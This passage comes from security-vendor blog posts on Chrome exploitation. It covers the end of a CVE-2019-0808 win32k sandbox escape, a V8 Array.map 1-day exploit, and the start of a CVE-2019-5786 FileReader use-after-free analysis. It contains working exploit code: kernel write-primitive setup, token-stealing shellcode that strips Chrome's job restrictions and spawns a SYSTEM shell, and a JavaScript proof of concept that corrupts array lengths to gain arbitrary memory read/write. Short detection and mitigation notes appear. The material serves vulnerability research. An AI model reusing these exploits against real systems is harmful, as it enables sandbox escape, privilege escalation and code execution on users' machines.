                                                         // operation should occur, minus an 
                                                         // offset of 0x4.
          temp_var_PITEM = var_PITEM;
          if ( var_PITEM )
          {
            ...
            var_PITEM_Minus_Offset_Of_0x6C = MNGetpItem(var_POPUPMENU_copy, uIndex - 1); // Get the 
                                                         // address where the second write operation 
                                                         // should occur, minus an offset of 0x4. This 
                                                         // address will be 0x6C bytes earlier in 
                                                         // memory than the address in var_PITEM.
            if ( fSet )
            {
              *((_DWORD *)temp_var_PITEM + 1) |= 0x80000000; // Conduct the first write to the 
                                                             // attacker controlled address.
              if ( var_PITEM_Minus_Offset_Of_0x6C )
              {
                *((_DWORD *)var_PITEM_Minus_Offset_Of_0x6C + 1) |= 0x40000000u; 
                                                    // Conduct the second write to the attacker
                                                    // controlled address minus 0x68 (0x6C-0x4).

Once the kernel write operation within xxxMNSetGapState() is finished, the undocumented window message 0x1E5 will be sent. The updated exploit catches this message in the following code.

else {
	if ((cwp->message == 0x1E5)) {
		UINT offset = 0; // Create the offset variable which will hold the offset from the
					           // start of hPrimaryWindow's cbwnd data field to write to.

		UINT addressOfStartofPrimaryWndCbWndData = (primaryWindowAddress + 0xB0); // Set 
                                 // addressOfStartofPrimaryWndCbWndData to the address of
                                 // the start of hPrimaryWindow's cbwnd data field.

		// Set offset to the difference between hSecondaryWindow's
		// strName.Buffer's memory address and the address of
		// hPrimaryWindow's cbwnd data field.
		offset = ((secondaryWindowAddress + 0x8C) - addressOfStartofPrimaryWndCbWndData);
		printf("[*] Offset: 0x%08X\r\n", offset);

		// Set the strName.Buffer address in hSecondaryWindow to (secondaryWindowAddress + 0x16),
    // or the address of the bServerSideWindowProc bit.
		if (SetWindowLongA(hPrimaryWindow, offset, (secondaryWindowAddress + 0x16)) == 0) {
			printf("[!] SetWindowLongA malicious error: 0x%08X\r\n", GetLastError());
			ExitProcess(-1);
		}
		else {
			printf("[*] SetWindowLongA called to set strName.Buffer address. Current strName.Buffer address that is being adjusted: 0x%08X\r\n", (addressOfStartofPrimaryWndCbWndData + offset));
		}

This code will start by checking if the window message was 0x1E5. If it was then the code will calculate the distance between the start of primaryWindow‘s wndExtra data section and the location of secondaryWindow‘s strName.Buffer pointer. The difference between these two locations will be saved into the variable offset.

Once this is done, SetWindowLongA() is called using hPrimaryWindow and the offset variable to set secondaryWindow‘s strName.Buffer pointer to the address of secondaryWindow‘s bServerSideWindowProc field. The effect of this operation can be seen in the diagram below.

Using SetWindowLong() to change secondaryWindow’s strName.Buffer pointer

By performing this action, when SetWindowText() is called on secondaryWindow, it will proceed to use its overwritten strName.Buffer pointer to determine where the write should be conducted, which will result in secondaryWindow‘s bServerSideWindowProc flag being overwritten if an appropriate value is supplied as the lpString argument to SetWindowText().

Abusing the tagWND Write Primitive to Set the bServerSideWindowProc Bit

Once the strName.Buffer field within secondaryWindow has been set to the address of secondaryWindow‘s bServerSideWindowProc flag, SetWindowText() is called using an hWnd parameter of hSecondaryWindow and an lpString value of “\x06” in order to enable the bServerSideWindowProc flag in secondaryWindow.

// Write the value \x06 to the address pointed to by hSecondaryWindow's strName.Buffer 
// field to set the bServerSideWindowProc bit in hSecondaryWindow.
if (SetWindowTextA(hSecondaryWindow, "\x06") == 0) {
	printf("[!] SetWindowTextA couldn't set the bServerSideWindowProc bit. Error was: 0x%08X\r\n", GetLastError());
	ExitProcess(-1);
}
else {
	printf("Successfully set the bServerSideWindowProc bit at: 0x%08X\r\n", (secondaryWindowAddress + 0x16));

The following diagram shows what secondaryWindow‘s tagWND layout looks like before and after the SetWindowTextA() call.

Setting the bServerSideWindowProc flag in secondaryWindow with SetWindowText()

Setting the bServerSideWindowProc flag ensures that secondaryWindow‘s window procedure, sprayCallback(), will now run in kernel mode with SYSTEM level privileges, rather than in user mode like most other window procedures. This is a popular vector for privilege escalation and has been used in many attacks such as a 2017 attack by the Sednit APT group. The following diagram illustrates this in more detail.

Effect of setting bServerSideWindowProc

Stealing the Process Token and Removing the Job Restrictions

Once the call to SetWindowTextA() is completed, a WM_ENTERIDLE message will be sent to hSecondaryWindow, as can be seen in the following code.

printf("Sending hSecondaryWindow a WM_ENTERIDLE message to trigger the execution of the shellcode as SYSTEM.\r\n");
SendMessageA(hSecondaryWindow, WM_ENTERIDLE, NULL, NULL);
if (success == TRUE) {
	printf("[*] Successfully exploited the program and triggered the shellcode!\r\n");
}
else {
	printf("[!] Didn't exploit the program. For some reason our privileges were not appropriate.\r\n");
	ExitProcess(-1);
}

The WM_ENTERIDLE message will then be picked up by secondaryWindow‘s window procedure sprayCallback(). The code for this function can be seen below.

// Tons of thanks go to https://github.com/jvazquez-r7/MS15-061/blob/first_fix/ms15-061.cpp for
// additional insight into how this function should operate. Note that a token stealing shellcode
// is called here only because trying to spawn processes or do anything complex as SYSTEM
// often resulted in APC_INDEX_MISMATCH errors and a kernel crash.
LRESULT CALLBACK sprayCallback(HWND hWnd, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
	if (uMsg == WM_ENTERIDLE) {
		WORD um = 0;
		__asm
		{
			// Grab the value of the CS register and
			// save it into the variable UM.
			mov ax, cs
			mov um, ax
		}
		// If UM is 0x1B, this function is executing in usermode
		// code and something went wrong. Therefore output a message that
		// the exploit didn't succeed and bail.
		if (um == 0x1b)
		{
			// USER MODE
			printf("[!] Exploit didn't succeed, entered sprayCallback with user mode privileges.\r\n");
			ExitProcess(-1); // Bail as if this code is hit either the target isn't 
                       // vulnerable or something is wrong with the exploit.
		}
		else
		{
			success = TRUE; // Set the success flag to indicate the sprayCallback()
                      // window procedure is running as SYSTEM.
			Shellcode(); // Call the Shellcode() function to perform the token stealing and
						       // to remove the Job object on the Chrome renderer process.
		}
	}
	return DefWindowProc(hWnd, uMsg, wParam, lParam);
}

As the bServerSideWindowProc flag has been set in secondaryWindow‘s tagWND object, sprayCallback() should now be running as the SYSTEM user. The sprayCallback() function first checks that the incoming message is a WM_ENTERIDLE message. If it is, then inlined shellcode will ensure that sprayCallback() is indeed being run as the SYSTEM user. If this check passes, the boolean success is set to TRUE to indicate the exploit succeeded, and the function Shellcode() is executed.

Shellcode() will perform a simple token stealing exploit using the shellcode shown on abatchy’s blog post with two slight modifications which have been highlighted in the code below.

// Taken from https://www.abatchy.com/2018/01/kernel-exploitation-2#token-stealing-payload-windows-7-x86-sp1.
// Essentially a standard token stealing shellcode, with two lines 
// added to remove the Job object associated with the Chrome 
// renderer process.
__declspec(noinline) int Shellcode()
{
	__asm {
		xor eax, eax // Set EAX to 0.
		mov eax, DWORD PTR fs : [eax + 0x124] // Get nt!_KPCR.PcrbData.
											 // _KTHREAD is located at FS:[0x124]

		mov eax, [eax + 0x50] // Get nt!_KTHREAD.ApcState.Process
		mov ecx, eax // Copy current process _EPROCESS structure
		xor edx, edx // Set EDX to 0.
		mov DWORD PTR [ecx + 0x124], edx // Set the JOB pointer in the _EPROCESS structure to NULL.
		mov edx, 0x4 // Windows 7 SP1 SYSTEM process PID = 0x4

		SearchSystemPID:
			mov eax, [eax + 0B8h] // Get nt!_EPROCESS.ActiveProcessLinks.Flink
			sub eax, 0B8h
			cmp [eax + 0B4h], edx // Get nt!_EPROCESS.UniqueProcessId
			jne SearchSystemPID

		mov edx, [eax + 0xF8] // Get SYSTEM process nt!_EPROCESS.Token
		mov [ecx + 0xF8], edx // Assign SYSTEM process token.
	}
}

The modification takes the EPROCESS structure for Chrome renderer process, and NULLs out its Job pointer. This is done because during experiments it was found that even if the shellcode stole the SYSTEM token, this token would still inherit the job object of the Chrome renderer process, preventing the exploit from being able to spawn any child processes. NULLing out the Job pointer within the Chrome renderer process prior to changing the Chrome renderer process’s token removes the job restrictions from both the Chrome renderer process and any tokens that later get assigned to it, preventing this from happening.

To better understand the importance of NULLing the job object, examine the following dump of the process token for a normal Chrome renderer process. Notice that the Job object field is filled in, so the job object restrictions are currently being applied to the process.

0: kd> !process C54
Searching for Process with Cid == c54
PROCESS 859b8b40  SessionId: 2  Cid: 0c54    Peb: 7ffd9000  ParentCid: 0f30
    DirBase: bf2f2cc0  ObjectTable: 8258f0d8  HandleCount: 213.
    Image: chrome.exe
    VadRoot 859b9e50 Vads 182 Clone 0 Private 2519. Modified 718. Locked 0.
    DeviceMap 9abe5608
    Token                             a6fccc58
    ElapsedTime                       00:00:18.588
    UserTime                          00:00:00.000
    KernelTime                        00:00:00.000
    QuotaPoolUsage[PagedPool]         351516
    QuotaPoolUsage[NonPagedPool]      11080
    Working Set Sizes (now,min,max)  (9035, 50, 345) (36140KB, 200KB, 1380KB)
    PeakWorkingSetSize                9730
    VirtualSize                       734 Mb
    PeakVirtualSize                   740 Mb
    PageFaultCount                    12759
    MemoryPriority                    BACKGROUND
    BasePriority                      8
    CommitCharge                      5378
    Job                               859b3ec8

        THREAD 859801e8  Cid 0c54.08e8  Teb: 7ffdf000 Win32Thread: fe118dc8 WAIT: (UserRequest) UserMode Non-Alertable
            859c6dc8  SynchronizationEvent

To confirm these restrictions are indeed in place, one can examine the process token for this process in Process Explorer, which confirms that the job contains a number of restrictions, such as prohibiting the spawning of child processes.

Job restrictions on the Chrome renderer process preventing spawning of child processes

If the Job field within this process token is set to NULL, WinDBG’s !process command no longer associates a job with the object.

1: kd> dt nt!_EPROCESS 859b8b40 Job
   +0x124 Job : 0x859b3ec8 _EJOB
1: kd> dd 859b8b40+0x124
859b8c64  859b3ec8 99c4d988 00fd0000 c512eacc
859b8c74  00000000 00000000 00000070 00000f30
859b8c84  00000000 00000000 00000000 9abe5608
859b8c94  00000000 7ffaf000 00000000 00000000
859b8ca4  00000000 a4e89000 6f726863 652e656d
859b8cb4  00006578 01000000 859b3ee0 859b3ee0
859b8cc4  00000000 85980450 85947298 00000000
859b8cd4  862f2cc0 0000000e 265e67f7 00008000
1: kd> ed 859b8c64 0
1: kd> dd 859b8b40+0x124
859b8c64  00000000 99c4d988 00fd0000 c512eacc
859b8c74  00000000 00000000 00000070 00000f30
859b8c84  00000000 00000000 00000000 9abe5608
859b8c94  00000000 7ffaf000 00000000 00000000
859b8ca4  00000000 a4e89000 6f726863 652e656d
859b8cb4  00006578 01000000 859b3ee0 859b3ee0
859b8cc4  00000000 85980450 85947298 00000000
859b8cd4  862f2cc0 0000000e 265e67f7 00008000
1: kd> dt nt!_EPROCESS 859b8b40 Job
   +0x124 Job : (null)
1: kd> !process C54
Searching for Process with Cid == c54
PROCESS 859b8b40  SessionId: 2  Cid: 0c54    Peb: 7ffd9000  ParentCid: 0f30
    DirBase: bf2f2cc0  ObjectTable: 8258f0d8  HandleCount: 214.
    Image: chrome.exe
    VadRoot 859b9e50 Vads 180 Clone 0 Private 2531. Modified 720. Locked 0.
    DeviceMap 9abe5608
    Token                             a6fccc58
    ElapsedTime                       00:14:15.066
    UserTime                          00:00:00.015
    KernelTime                        00:00:00.000
    QuotaPoolUsage[PagedPool]         351132
    QuotaPoolUsage[NonPagedPool]      10960
    Working Set Sizes (now,min,max)  (9112, 50, 345) (36448KB, 200KB, 1380KB)
    PeakWorkingSetSize                9730
    VirtualSize                       733 Mb
    PeakVirtualSize                   740 Mb
    PageFaultCount                    12913
    MemoryPriority                    BACKGROUND
    BasePriority                      4
    CommitCharge                      5355

        THREAD 859801e8  Cid 0c54.08e8  Teb: 7ffdf000 Win32Thread: fe118dc8 WAIT: (UserRequest) UserMode Non-Alertable
            859c6dc8  SynchronizationEvent

Examining Process Explorer once again confirms that since the Job field in the Chrome render’s process token has been NULL’d out, there is no longer any job associated with the Chrome renderer process. This can be seen in the following screenshot, which shows that the Job tab is no longer available for the Chrome renderer process since no job is associated with it anymore, which means it can now spawn any child process it wishes.

No job object is associated with the process after the Job pointer is set to NULL

Spawning the New Process

Once Shellcode() finishes executing, WindowHookProc() will conduct a check to see if the variable success was set to TRUE, indicating that the exploit completed successfully. If it has, then it will print out a success message before returning execution to main().

if (success == TRUE) {
	printf("[*] Successfully exploited the program and triggered the shellcode!\r\n");
}
else {
	printf("[!] Didn't exploit the program. For some reason our privileges were not appropriate.\r\n");
	ExitProcess(-1);
}

main() will exit its window message handling loop since there are no more messages to be processed and will then perform a check to see if success is set to TRUE. If it is, then a call to WinExec() will be performed to execute cmd.exe with SYSTEM privileges using the stolen SYSTEM token.

// Execute command if exploit success.
if (success == TRUE) {
	WinExec("cmd.exe", 1);
}

Demo Video

The following video demonstrates how this vulnerability was combined with István Kurucsai’s exploit for CVE-2019-5786 to form the fully working exploit chain described in Google’s blog post. Notice the attacker can spawn arbitrary commands as the SYSTEM user from Chrome despite the limitations of the Chrome sandbox.

Code for the full exploit chain can be found on GitHub:
https://github.com/exodusintel/CVE-2019-0808

Detection

Detection of exploitation attempts can be performed by examining user mode applications to see if they make any calls to CreateWindow() or CreateWindowEx() with an lpClassName parameter of “#32768”. Any user mode applications which exhibit this behavior are likely malicious since the class string “#32768” is reserved for system use, and should therefore be subject to further inspection.

Mitigation

Running Windows 8 or higher prevents attackers from being able to exploit this issue since Windows 8 and later prevents applications from mapping the first 64 KB of memory (as mentioned on slide 33 of Matt Miller’s 2012 BlackHat slidedeck), which means that attackers can’t allocate the NULL page or memory near the null page such as 0x30. Additionally upgrading to Windows 8 or higher will also allow Chrome’s sandbox to block all calls to win32k.sys, thereby preventing the attacker from being able to call NtUserMNDragOver() to trigger this vulnerability.

On Windows 7, the only possible mitigation is to apply KB4489878 or KB4489885, which can be downloaded from the links in the CVE-2019-0808 advisory page.

Conclusion

Developing a Chrome sandbox escape requires a number of requirements to be met. However, by combining the right exploit with the limited mitigations of Windows 7, it was possible to make a working sandbox exploit from a bug in win32k.sys to illustrate the 0Day exploit chain originally described in Google’s blog post.

The timely and detailed analysis of vulnerabilities are some of benefits of an Exodus nDay Subscription. This subscription also allows offensive groups to test mitigating controls and detection and response functions within their organisations. Corporate SOC/NOC groups also make use of our nDay Subscription to keep watch on critical assets.

The post Windows Within Windows – Escaping The Chrome Sandbox With a Win32k NDay appeared first on Exodus Intelligence.

A window of opportunity: exploiting a Chrome 1day vulnerability

3 April 2019 at 09:38

This post explores the possibility of developing a working exploit for a vulnerability already patched in the v8 source tree before the fix makes it into a stable Chrome release.

Chrome Release Schedule

Chrome has a relatively tight release cycle of pushing a new stable version every 6 weeks with stable refreshes in between if warranted by critical issues. As a result of its open-source development model, while security fixes are immediately visible in the source tree, they need time to be tested in the non-stable release channels of Chrome before they can be pushed out via the auto-update mechanism as part of a stable release to most of the user-base.

In effect, there’s a window of opportunity for attackers ranging from a couple days to weeks in which the vulnerability details are practically public yet most of the users are vulnerable and cannot obtain a patch.

Open Source Patch Analysis

Looking through the git log of v8 can be an overwhelming experience. There was a change however that caught my attention immediately. The fix has the following commit message:

[TurboFan] Array.prototype.map wrong ElementsKind for output array.

The associated chromium issue tracker entry is restricted and likely to remain so for months. However, it has all the ingredients that might allow an attacker to produce an exploit quickly, which is the ultimate goal here: TurboFan is the optimizing JIT compiler of v8, which has become a hot target recently. Array vulnerabilities are always promising and this one hints at a type confusion between element kinds, which can be relatively straightforward to exploit. The patch also includes a regression test that effectively triggers the vulnerability, which can also help shorten exploit development time.

The only modified method is JSCallReducer::ReduceArrayMap in src/compiler/js-call-reducer.cc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Reduction JSCallReducer::ReduceArrayMap(Node* node,
const SharedFunctionInfoRef&amp; shared) {
Node* original_length = effect = graph()-&gt;NewNode(
simplified()-&gt;LoadField(AccessBuilder::ForJSArrayLength(kind)), receiver,
effect, control);

+ // If the array length &gt;= kMaxFastArrayLength, then CreateArray
+ // will create a dictionary. We should deopt in this case, and make sure
+ // not to attempt inlining again.
+ original_length = effect = graph()-&gt;NewNode(
+ simplified()-&gt;CheckBounds(p.feedback()), original_length,
+ jsgraph()-&gt;Constant(JSArray::kMaxFastArrayLength), effect, control);
+
// Even though {JSCreateArray} is not marked as {kNoThrow}, we can elide the
// exceptional projections because it cannot throw with the given parameters.
Node* a = control = effect = graph()-&gt;NewNode(
javascript()-&gt;CreateArray(1, MaybeHandle()),
array_constructor, array_constructor, original_length, context,
outer_frame_state, effect, control);

JSCallReducer runs during the InliningPhase of TurboFan, its ReduceArrayMap method attempts to replace calls to Array.prototype.map with inlined code. The comments are descriptive, the added lines insert a check to verify that the length of the array is below kMaxFastArrayLength (which is 32 MiB). This length is passed to CreateArray, which returns a new array.

The v8 engine has different optimizations for the storage of arrays that have specific characteristics. For example, PACKED_DOUBLE_ELEMENTS is the elements kind used for arrays that only have double elements and no holes. These are stored as a contiguous array in memory and allow for efficient code generation for operations like map. Confusion between the different element kinds is a common source of security vulnerabilities.

So why is it a problem if the length is above kMaxFastArrayLength? Because CreateArray will return an array with a dictionary element kind for such lengths. Dictionaries are used for large and sparse arrays and are basically hash tables. However, by feeding it the right type feedback, TurboFan will try to generate optimized code for contiguous arrays. This is a common property of many JIT compiler vulnerabilities: the compiler makes an optimization based on type feedback but a corner case allows an attacker to break the assumption during runtime of the generated code.

Since the dictionary and contiguous element kinds have vastly different backing storage mechanisms, this allows for memory corruption. In effect, the output array will be a small (considering its size in memory, not its length property) dictionary that will be accessed by the optimized code as if it was a large (again, considering its size in memory) contiguous region.

Looking at the regression test included in the fix, it feeds the mapping function with feedback for an array with contiguous storage (Lines 6-13), then after it’s been optimized by Turbofan, invokes it with an array that is large enough so that the output of map will end up with dictionary element kind.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
// Copyright 2019 the V8 project authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

// Set up a fast holey smi array, and generate optimized code.
let a = [1, 2, ,,, 3];
function mapping(a) {
return a.map(v =&gt; v);
}
mapping(a);
mapping(a);
%OptimizeFunctionOnNextCall(mapping);
mapping(a);

// Now lengthen the array, but ensure that it points to a non-dictionary
// backing store.
a.length = (32 * 1024 * 1024)-1;
a.fill(1,0);
a.push(2);
a.length += 500;
// Now, the non-inlined array constructor should produce an array with
// dictionary elements: causing a crash.
mapping(a);

Exploitation

Since the map operation will write ~32 million elements out-of-bounds to the output array, the regression test essentially triggers a wild memcpy. To make exploitation possible, the loop of map needs to be stopped. This is possible by providing a callback function that raises an exception after the desired number of iterations. Another issue is that it overwrites everything linearly without skips, while ideally we would like to only selectively overwrite a single value at a specific offset, e.g. the length property of an adjacent array. Reading through the documentation of Array.prototype.map, the following can be seen:

map calls a provided callback function once for each element in an array, in order, and constructs a new array from the results. callback is invoked only for indexes of the array which have assigned values, including undefined. It is not called for missing elements of the array (that is, indexes that have never been set, which have been deleted or which have never been assigned a value).

So unset elements (holes) are skipped and map writes nothing to the output array for those indexes. The PoC code below utilizes both of these behaviors to overwrite the length of an array adjacent to the map output array.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
// This call ensures that TurboFan won't inline array constructors.
Array(2**30);

// we are aiming for the following object layout
// [output of Array.map][packed float array]
// First the length of the packed float array is corrupted via the original vulnerability,

// offset of the length field of the float array from the map output
const float_array_len_offset = 23;

// Set up a fast holey smi array, and generate optimized code.
let a = [1, 2, ,,, 3];
var float_array;

function mapping(a) {
function cb(elem, idx) {
if (idx == 0) {
float_array = [0.1, 0.2];
}
if (idx &gt; float_array_len_offset) {
// minimize the corruption for stability
throw "stop";
}
return idx;
}

return a.map(cb);
}
mapping(a);
mapping(a);
%OptimizeFunctionOnNextCall(mapping);
mapping(a);

// Now lengthen the array, but ensure that it points to a non-dictionary
// backing store.
a.length = (32 * 1024 * 1024)-1;
a.fill(1, float_array_len_offset, float_array_len_offset+1);
a.fill(1, float_array_len_offset+2);

a.push(2);
a.length += 500;

// Now, the non-inlined array constructor should produce an array with
// dictionary elements: causing a crash.
cnt = 1;
try {
mapping(a);
} catch(e) {
console.log(float_array.length);
console.log(float_array[3]);
}

At this point, we have a float array that can be used for out-of-bounds reads and writes. The exploit aims for the following object layout on the heap to capitalize on this:

[output of Array.map][packed float array][typed array][obj]

The corrupted float array is used to modify the backing store pointer of the typed array, thus achieving arbitrary read/write. obj at the end is used to leak the address of arbitrary objects by setting them as inline properties on it then reading their address through the float array. From then on, the exploit follows the steps described in my previous post to achieve arbitrary code execution by creating an RWX page via WebAssembly, traversing the JSFunction object hierarchy to find it in memory and place the shellcode there.

The full exploit code which works on the latest stable version (v73.0.3683.86 as of 3rd April 2019) can be found on our github and it can be seen in action below. It’s quite reliable and could also be integrated with a Site-Isolation based brute-forcer, as discussed in our previous blog posts. Note that a sandbox escape would be needed for a complete chain.

Detection

The exploit doesn’t rely on any uncommon features or cause unusual behavior in the renderer process, which makes distinguishing between malicious and benign code difficult without false positive results.

Mitigation

Disabling JavaScript execution via the Settings / Advanced settings / Privacy and security / Content settings menu provides effective mitigation against the vulnerability.

Conclusion

The idea of developing exploits for 1day vulnerabilities before the fix becomes available isn’t new and the issue is definitely not unique to Chrome. Even though exploits developed for such vulnerabilities have a short lifespan, malicious actors may take advantage of them, as they avoid the risk of burning 0days. Keeping up-to-date on patches/updates from a vendor or relying on public advisories isn’t good enough. One needs to dig deep into a patch to know if it applies to an exploitable security vulnerability.

The timely analysis of these 1day vulnerabilities is one of the key differentiators of our Exodus nDay Subscription. It enables our customers to ensure their defensive measures have been implemented properly even in the absence of a proper patch from the vendor. This subscription also allows offensive groups to test mitigating controls and detection and response functions within their organisations. Corporate SOC/NOC groups also make use of our nDay Subscription to keep watch on critical assets.

The post A window of opportunity: exploiting a Chrome 1day vulnerability appeared first on Exodus Intelligence.

CVE-2019-5786: Analysis & Exploitation of the recently patched Chrome vulnerability

20 March 2019 at 15:27

This post provides detailed analysis and an exploit achieving remote code execution for the recently fixed Chrome vulnerability that was observed by Google to be exploited in the wild.

Patch Analysis

The release notes from Google are short on information as usual:

[$N/A][936448] High CVE-2019-5786: Use-after-free in FileReader. Reported by Clement Lecigne of Google’s Threat Analysis Group on 2019-02-27

As described on MDN, the “FileReader object lets web applications asynchronously read the contents of files (or raw data buffers) stored on the user’s computer, using File or Blob objects to specify the file or data to read”. It can be used to read the contents of files selected in a file open dialog by the user or Blobs created by script code. An example usage is shown in below.

1
2
3
4
5
6
7
8
9
10
11
12
13
let reader = new FileReader();

reader.onloadend = function(evt) {
console.log(`contents as an ArrayBuffer: ${evt.target.result}`);
}

reader.onprogress = function(evt) {
console.log(`read ${evt.target.result.byteLength} bytes so far`);
}

let contents = "filecontents";
f = new File([contents], "a.txt");
reader.readAsArrayBuffer(f);

It is important to note that the File or Blob contents are read asynchronously and the user JS code is notified of the progress via callbacks. The onprogress event may be fired multiple times while the reading is in progress, giving access to the contents read so far. The onloadend event is triggered once the operation is completed, either in success or failure.

Searching for the issue number in the Chromium git logs quickly reveals the patch for the vulnerability, which alters a single function. The original, vulnerable version is shown below.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
DOMArrayBuffer* FileReaderLoader::ArrayBufferResult() {
DCHECK_EQ(read_type_, kReadAsArrayBuffer);
if (array_buffer_result_)
return array_buffer_result_;

// If the loading is not started or an error occurs, return an empty result.
if (!raw_data_ || error_code_ != FileErrorCode::kOK)
return nullptr;

DOMArrayBuffer* result = DOMArrayBuffer::Create(raw_data_-&gt;ToArrayBuffer());
if (finished_loading_) {
array_buffer_result_ = result;
AdjustReportedMemoryUsageToV8(
-1 * static_cast(raw_data_-&gt;ByteLength()));
raw_data_.reset();
}
return result;
}

This function gets called each time the result property is accessed in a callback after a FileReader.readAsArrayBuffer call in JavaScript.

While the object hierarchy around the C++ implementation of ArrayBuffers is relatively complicated, the important pieces are described below. Note that the C++ namespaces of the different classes are included so that distinguishing between objects implemented in Chromium (the WTF and blink namespaces) and v8 (everything under the v8 namespace) is easier.

  • WTF::ArrayBuffer: the embedder-side (Chromium) implementation of the ArrayBuffer concept. WTF::ArrayBuffer objects are reference counted and contain the raw pointer to their underlying memory buffer, which is freed when the reference count of an ArrayBuffer reaches 0.
  • blink::DOMArrayBufferBase: a garbage collected class containing a smart pointer to a WTF::ArrayBuffer.
  • blink::DOMArrayBuffer: class inheriting from blink::DOMArrayBufferBase, describing an ArrayBuffer in Chromium. Represented in the JavaScript engine by a v8::internal::JSArrayBuffer instance.
  • WTF::ArrayBufferBuilder: helper class to construct a WTF::ArrayBuffer incrementally. Holds a smart pointer to the ArrayBuffer.
  • blink::FileReaderLoader: responsible for loading the File or Blob contents. Uses WTF::ArrayBufferBuilder to build the ArrayBuffer as the data is read.

Comparing the code to the fixed version shown below, the most important difference is that if loading is not finished, the patched version creates new ArrayBuffer objects using the ArrayBuffer::Create function while the vulnerable version simply passes on a reference to the existing ArrayBuffer to the DOMArrayBuffer::Create function. ToArrayBuffer always returns the actual state of the ArrayBuffer being built but since the reading is a asynchronous, it may return the same one under some circumstances.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
DOMArrayBuffer* FileReaderLoader::ArrayBufferResult() {
DCHECK_EQ(read_type_, kReadAsArrayBuffer);
if (array_buffer_result_)
return array_buffer_result_;

// If the loading is not started or an error occurs, return an empty result.
if (!raw_data_ || error_code_ != FileErrorCode::kOK)
return nullptr;

if (!finished_loading_) {
return DOMArrayBuffer::Create(
ArrayBuffer::Create(raw_data_-&gt;Data(), raw_data_-&gt;ByteLength()));
}

array_buffer_result_ = DOMArrayBuffer::Create(raw_data_-&gt;ToArrayBuffer());
AdjustReportedMemoryUsageToV8(-1 *
static_cast(raw_data_-&gt;ByteLength()));
raw_data_.reset();
return array_buffer_result_;
}

What are those circumstances? The raw_data_ variable in the code is of the type ArrayBufferBuilder, which is used to construct the result ArrayBuffer from the incrementally read data by dynamically allocating larger and larger underlying ArrayBuffers as needed. The ToArrayBuffer method returns a smart pointer to this underlying ArrayBuffer if the contents read so far fully occupy the currently allocated buffer and creates a new one via slicing if the buffer is not fully used yet.

1
2
3
4
5
6
7
scoped_refptr ArrayBufferBuilder::ToArrayBuffer() {
// Fully used. Return m_buffer as-is.
if (buffer_-&gt;ByteLength() == bytes_used_)
return buffer_;

return buffer_-&gt;Slice(0, bytes_used_);
}

One way to abuse the multiple references to the same ArrayBuffer is by detaching the ArrayBuffer through one and using the other, now dangling, reference. The javascript postMessage() method can be used to send messages to a JS Worker. It also has an additional parameter, transfer, which is an array of Transferable objects, the ownership of which are transfered to the Worker.

The transfer is done by the blink::SerializedScriptValue::TransferArrayBufferContents function, which iterates over the DOMArrayBuffers provided in the transfer parameter to postMessage and invokes the Transfer method of each, as shown below. blink::-DOMArrayBuffer::Transfer calls into WTF::ArrayBuffer::Transfer, which transfers the ownership of the underlying data buffer.

The vulnerability can be triggered by passing multiple blink::DOMArrayBuffers that reference the same underlying ArrayBuffer to postMessage. Transferring the first will take ownership of its buffer, then the transfer of the second will fail because its underlying ArrayBuffer has already been neutered. This causes blink::SerializedScriptValue::TransferArrayBufferContents to enter an error path, freeing the already transferred ArrayBuffer but leaving a dangling reference to it in the second blink::DOMArrayBuffer, which can then be used to access the freed memory through JavaScript.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
SerializedScriptValue::TransferArrayBufferContents(
...
for (auto* it = array_buffers.begin(); it != array_buffers.end(); ++it) {
DOMArrayBufferBase* array_buffer_base = *it;
if (visited.Contains(array_buffer_base))
continue;
visited.insert(array_buffer_base);

wtf_size_t index = static_cast(std::distance(array_buffers.begin(), it));
...
DOMArrayBuffer* array_buffer = static_cast&lt;domarraybuffer*&gt;(array_buffer_base);&lt;/domarraybuffer*&gt;

if (!array_buffer-&gt;Transfer(isolate, contents.at(index))) {
exception_state.ThrowDOMException(DOMExceptionCode::kDataCloneError,
"ArrayBuffer at index " +
String::Number(index) +
" could not be transferred.");
return ArrayBufferContentsArray();
}
}

Exploitation

The vulnerability can be turned into an arbitrary read/write primitive by reclaiming the memory region pointed to by the dangling pointer with JavaScript TypedArrays and corrupting their length and backing store pointers. This can then be further utilized to achieve arbitrary code execution in the renderer process.

Memory Management in Chrome

There are several aspects of memory management in Chrome that affect the reliability of the vulnerability. Chrome uses PartitionAlloc to allocate the backing store of ArrayBuffers. This effectively separates ArrayBuffer backing stores from other kinds of allocations, making the vulnerability unexploitable if the region that is freed is below 2MiB in size because PartitionAlloc will never reuse those allocations for other kinds of data. If the backing store size is above 2MiB, it is placed in a directly mapped region. Once freed, other kinds of allocations can reuse such a region. However, successfully reclaiming the freed region is only possible on 32-bit platforms, as PartitionAlloc adds additional randomness to its allocations via VirtualAlloc and mmap address hinting on 64-bit platforms beside their ASLR slides.

On a 32-bit Windows 7 install, the address space of a fresh Chrome process is similar to the one shown below. Note that these addresses are not static and will differ by the ASLR slide of Windows. Bottom-up allocations start from the lower end of the address space, the last one is the reserved region starting at 36681000. Windows heaps, PartitionAlloc regions, garbage collected heaps of v8 and Chrome, thread stacks are all placed among these regions in a bottom-up fashion. The backing store of the vulnerable ArrayBuffer will also reside here. An important thing to note is that Chrome makes a 512MiB reserved allocation (from 4600000 on the listing below) early on. This is done because the address space on x86 Windows systems is tight and gets fragmented quickly, therefore Chrome makes an early reservation to be able to hand it out for large contiguous allocations, like ArrayBuffers, if needed. Once an ArrayBuffer allocation fails, Chrome frees this reserved region and tries again. The logic that handles this could complicate exploitation, so the exploit starts out by attempting a large (1GiB) ArrayBuffer allocation. This will cause Chrome to free the reserved region, then fail to allocate again, since the address space cannot have a gap of the requested size. While most OOM conditions kill the renderer process, ArrayBuffer allocation failures are recoverable from JavaScript via exception handling.

1
2
3
4
5
6
7
8
9
10
11
12
13
...
45f5000 45f8000 3000 MEM_PRIVATE MEM_COMMIT PAGE_READWRITE [................]
45f8000 4600000 8000 MEM_PRIVATE MEM_RESERVE
